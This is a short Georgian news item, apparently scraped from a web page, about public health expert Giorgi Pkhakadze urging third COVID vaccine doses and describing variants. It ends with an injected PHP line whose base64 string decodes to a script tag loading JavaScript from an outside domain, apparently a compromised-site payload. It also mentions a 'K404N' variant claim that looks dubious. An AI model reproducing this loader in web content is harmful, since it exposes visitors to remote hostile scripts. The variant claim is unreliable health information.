celsiusi
ავერსი საქკაბელი
საზოგადოებრივი ჯანდაცვის ექსპერტი, პროდესორი გიორგი ფხაკაძე სოციალურ ქსელში საფრანგეთში ვაქცინაციის ჯავშნის ვებ-პორტალის ფოტო-სქრინს აქვეყნებს და წერს, რომ უკვე ვაქცინის მესამე დოზაზე რეგისტრაციაც იწყება. 
 
მისი მტკიცებით, მესამე დოზით ვაქცინაცია გარდაუვალია. 
 
✅საფრანგეთში ვაქცინაციის პორტალი…
✅უკვე გახსნილია მე-2 დოზა და ასევე მე-3 დოზაც….
✅კოვიდ ვაქცინის მე-3 დოზა გარდაუვალია!
✅მზადება უნდა იყოს ახლა და არა 12 თვის შემდეგ!
✅მე-3 დიზა ფაიზერი ან მოდერნა!" - წერს ფხაკაძე. 
 
მისივე თქმით,  ინდური შტამის შორეული ნათესავია "ლამბდა". ძირითადად, ლათინურ ამერიკაში ვრცელდება,- ამის შესახებ საზოგადოებრივი ჯანდაცვის ექსპერტი, გიორგი ფხაკაძე აცხადებს. მისი თქმით, ვირუსის შეჩერება სინამდვილეში ძალიან მარტივია, თუ ჩვენ ხარისხიან სამედიცინო პირბადეს გამოვიყენებთ, თავშეყრის ადგილებზე უარს ვიტყვით და ავირებით.
 
"ძირითადი 4 ვირუსია და ინდოეთში არის ქვე-ვირუსები. ყველაზე საშიში ვირუსია K404N, რომელიც მართლა ძალიან საშიშია და ადამიანი რეანიმაციაში ხვდება 2-3 დღეში, ეს ვარიანტები გაგრძელდება, სანამ ჩვენ არ გავაჩერებთ ამ ვირუსს და გაჩერების საშუალება არის ძალიან მარტივი - სამედიცინო პირბადე, არანაირი თავშეყრის ადგილები და ვაქცინაცია," - განაცხადა გიორგი ფხაკაძემ.
2547
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");